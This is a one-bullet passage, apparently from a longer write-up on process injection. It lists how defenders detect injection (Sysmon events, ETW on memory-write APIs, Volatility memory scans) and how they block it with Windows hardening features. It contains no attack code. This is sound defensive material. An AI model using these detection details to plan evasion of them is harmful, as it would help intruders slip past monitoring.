  • Defenders catch the resulting behaviour through Sysmon EID 8/10, THREATINT ETW on VirtualAllocEx/WriteProcessMemory, and Volatility malfind/ldrmodules against unbacked RWX regions — and harden processes with ACG, CFG, HVCI, and ASR rules to break the primitive entirely.
